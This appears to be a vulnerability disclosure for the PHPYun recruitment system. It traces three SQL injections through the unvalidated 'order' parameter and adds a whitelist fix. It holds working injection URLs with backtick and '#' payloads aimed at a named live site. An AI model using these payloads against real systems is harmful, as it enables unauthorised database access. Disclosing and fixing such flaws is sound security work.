### Brief description:
PHP云人才系统 (PHPYun), build 20141229: three hidden SQL injections
### Details:
PHP云人才系统 has three SQL injections. All of them reach the database through the `order` request parameter, which is concatenated into an `ORDER BY` clause without validation.
0x01: Q&A front page
========================
The URL is:
```
http://www.hr135.com/ask/index.php?order=add_time
```
The `order` parameter is injectable.
Look at the code in /include/libs/Smarty_Compiler.class.php:5330:
```
5330 function _complie_qlist_start($tag_args)
5331 {
5332 $paramer = $this->_parse_attrs($tag_args);
5333 $item = str_replace("'","",$paramer[item]);
5334 global $db,$db_config,$config;
5335 $path = dirname(dirname(dirname(__FILE__)));
5336 $ParamerArr = $this->GetSmarty($paramer,$_GET);
5337 $paramer = $ParamerArr[arr];
5338 $Purl = $ParamerArr[purl];
5339
5340 $where=1;
5341 // sort column; defaults to the add time
5342 if($paramer[order]){
5343 if($paramer[order]=="addtime"){
5344 $paramer[order]="add_time";
5345 }
5346 if($paramer[order]=="answernum"){
5347 $paramer[order]="answer_num";
5348 }
5349 $order = " ORDER BY `".$paramer[order]."` desc"; // sink: only backticks around a request-controlled value
5350 }else{
5351 $order = " ORDER BY `add_time` desc";
5352 }
5353 if($paramer[cid]){
5354 $where .=" and `cid`='".$paramer[cid]."'";
5355 }
5356 if($paramer[uid]){
5357 $where .=" and `uid`='".$_COOKIE[uid]."'";
5358 }
5359 if($paramer[recom]){// "recommended" flag
5360 $where .=" and `is_recom`='1'";
5361 }
5362 if($paramer[limit]){
5363 $limit=" limit ".$paramer[limit];
5364 }
5365 if($paramer[ispage]){
5366 $limit = $this->PageNav($paramer,$_GET,"question",$where,$Purl,"","2");
5367 //$limit = $this->PageNav($paramer,$_GET,"q_class",$where,$Purl,'','2');
5368 //$this->_tpl_vars["firmurl"] = $config['sy_weburl']."/index.php?m=question".$ParamerArr[firmurl];
5369 }
5370 $rs = $db->select_all("question",$where.$order.$limit);
```
Line 5349 concatenates `$paramer[order]` straight into the SQL. The value is wrapped in backticks, but addslashes() escapes only single quotes, double quotes, backslashes and NUL, never the backtick, so an attacker can send a backtick to close the identifier quote and then append arbitrary SQL after it.
Now the caller, /ask/model/index.class.php:26:
```
26 function index_action(){
27 $this->public_action();
28 $this->yunset("c","index");
29 $this->yunset("order",$_GET['order']);
30 $my_attention=$this->obj->DB_select_once("attention","`uid`='".$this->uid."' and `type`='1'","ids");
31 $my_atten=@explode(',',rtrim($my_attention['ids'],","));
32 $this->seo('ask_index');
33 $this->yunset("my_atten",$my_atten);
34 $this->wenda_tpl('index');
35 }
```
`$this->yunset("order",$_GET['order']);` does no filtering on `order` and hands it to the template as the `@order` parameter.
Then in the template, template/ask/index.htm:15:
```
15 {yun:}qlist item=qlist ispage=1 t_len=20 order=@order limit=10{/yun}
16 <div class="answers_left_list">
17 <div class="answers_left_list_left">
18 <div class="answers_app_left" onmouseover="get_user_info('question_','{yun:}$qlist.id{/yun}','{yun:}$qlist.uid{/yun}','50');" onmouseout="hide_user_info('question_','{yun:}$qlist.id{/yun}')" id='question_{yun:}$qlist.id{/yun}' style=" cursor:pointer">
19 <img src="{yun:}$qlist.pic{/yun}" width="40" height="40" onerror="showImgDelay(this,'{yun:}$config.sy_weburl{/yun}/{yun:}$config.sy_friend_icon{/yun}',2);">
20 </div>
21 </div>
```
Line 15 passes `@order` into `_complie_qlist_start()`, completing the path from `$_GET['order']` to the query.
```
http://www.hr135.com/ask/index.php?order=add_time`
```
The SQL errors out and no data is returned:
![1.png](https://images.seebug.org/upload/201412/31110436a4657768661e09ae7cbde4699669d471.png)
```
http://www.hr135.com/ask/index.php?order=add_time`%20limit%201%23
```
Fetch one row:
![2.png](https://images.seebug.org/upload/201412/31110518d0a5b66fcb9e386a551d23b6df10be16.png)
```
http://www.hr135.com/ask/index.php?order=add_time`%20limit%202%23
```
Fetch two rows:
![3.png](https://images.seebug.org/upload/201412/3111052820c2a5dedf4ad9e010a75288b9440f86.png)
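The following is an added example, not PHPYun's own code. It reproduces the `ORDER BY` construction from `_complie_qlist_start()` in a stand-alone function, shows what the report's PoC value turns the query into, and puts a whitelist-based version next to it. The table name and the exact query shape that `$db->select_all()` produces are assumptions made for the example; the GET value is assumed to have passed through addslashes(), as the report states.

```php
<?php
// Added example, not code from PHPYun. Mirrors the ORDER BY handling of
// _complie_qlist_start() and contrasts it with a whitelist-based version.

// Vulnerable: addslashes() escapes ' " \ and NUL but never the backtick,
// and the backtick is exactly the quote this clause relies on.
function vulnerable_order_clause(string $order): string {
    $order = addslashes($order);
    if ($order === "addtime")   { $order = "add_time"; }
    if ($order === "answernum") { $order = "answer_num"; }
    return " ORDER BY `" . $order . "` desc";
}

// Hardened: the request value is only a lookup key into a fixed map of sort
// columns; anything not in the map falls back to the default and never
// reaches the SQL string. ORDER BY cannot take a bound parameter for the
// column name, so a whitelist is the correct fix here, not escaping.
const ALLOWED_ORDER = [
    'addtime'    => 'add_time',
    'add_time'   => 'add_time',
    'answernum'  => 'answer_num',
    'answer_num' => 'answer_num',
];

function safe_order_clause(?string $order): string {
    $col = ALLOWED_ORDER[$order ?? ''] ?? 'add_time';
    return " ORDER BY `" . $col . "` desc";
}

// Assumed shape of select_all("question", $where.$order.$limit) with $where = "1"
// and limit=10 from the template tag. Table name is an assumption.
function build_query(string $orderClause, string $limit = " limit 10"): string {
    return "SELECT * FROM `question` WHERE 1" . $orderClause . $limit;
}

// The report's PoC value, URL-decoded: add_time`%20limit%201%23
$payload = "add_time` limit 1#";

echo build_query(vulnerable_order_clause($payload)), PHP_EOL;
echo build_query(safe_order_clause($payload)), PHP_EOL;
```

Running it, the vulnerable path prints `SELECT * FROM `question` WHERE 1 ORDER BY `add_time` limit 1#` desc limit 10`. MySQL treats `#` to end of line as a comment, so the original ` desc limit 10` is discarded and the attacker's `limit 1` takes effect, which is why the PoC returns exactly one row and `limit 2` returns two. The whitelisted version prints `SELECT * FROM `question` WHERE 1 ORDER BY `add_time` desc limit 10` for the same input, because the payload is not a key in the map and falls back to `add_time`.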
0x02: Job search page
========================
The URL is:
```
http://www.hr135.com/index.php?m=com&order=id&c=search&keyword=a
```
The `order` parameter is injectable. Note that on this path the working payload needs no closing backtick, so `order` is evidently concatenated into the query unquoted here.
```
http://www.hr135.com/index.php?m=com&order=id`&c=search&keyword=a
```
SQL error, no data:
![4.png](https://images.seebug.org/upload/201412/31111717b98924fc04131718942a8a2b0a9f4894.png)
```
http://www.hr135.com/index.php?m=com&order=id%20limit%201%23&c=search&keyword=a
```
Fetch one row:
![5.png](https://images.seebug.org/upload/201412/311117251efd73b13125a12107557993b9de78ec.png)
```
http://www.hr135.com/index.php?m=com&order=id%20limit%202%23&c=search&keyword=a
```
Fetch two rows:
![6.png](https://images.seebug.org/upload/201412/31111731295c1689a8b114f5538c7196f8dcf885.png)
0x03: Recruiting (招人才) front page
========================
The URL is:
```
http://www.hr135.com/index.php?m=user&order=status_time
```
The `order` parameter is injectable.
```
http://www.hr135.com/index.php?m=user&order=status_time`
```
SQL error, no data:
![7.png](https://images.seebug.org/upload/201412/31112936e0b5414d133e5a7955aeba0109c85527.png)
```
http://www.hr135.com/index.php?m=user&order=status_time`%20limit%201%23
```
Fetch one row:
![8.png](https://images.seebug.org/upload/201412/31112945a30c0544f50262eea80edbb8ad671c5b.png)
```
http://www.hr135.com/index.php?m=user&order=status_time`%20limit%202%23
```
Fetch two rows:
![9.png](https://images.seebug.org/upload/201412/311129539c94289a19b8ab9ecf4a8f67c969734f.png)
### Proof of vulnerability:
![2.png](https://images.seebug.org/upload/201412/31110518d0a5b66fcb9e386a551d23b6df10be16.png)
```
http://www.hr135.com/ask/index.php?order=add_time`%20limit%202%23
```
Fetch two rows:
![3.png](https://images.seebug.org/upload/201412/3111052820c2a5dedf4ad9e010a75288b9440f86.png)
![5.png](https://images.seebug.org/upload/201412/311117251efd73b13125a12107557993b9de78ec.png)
```
http://www.hr135.com/index.php?m=com&order=id%20limit%202%23&c=search&keyword=a
```
Fetch two rows:
![6.png](https://images.seebug.org/upload/201412/31111731295c1689a8b114f5538c7196f8dcf885.png)
![8.png](https://images.seebug.org/upload/201412/31112945a30c0544f50262eea80edbb8ad671c5b.png)
```
http://www.hr135.com/index.php?m=user&order=status_time`%20limit%202%23
```
Fetch two rows:
![9.png](https://images.seebug.org/upload/201412/311129539c94289a19b8ab9ecf4a8f67c969734f.png)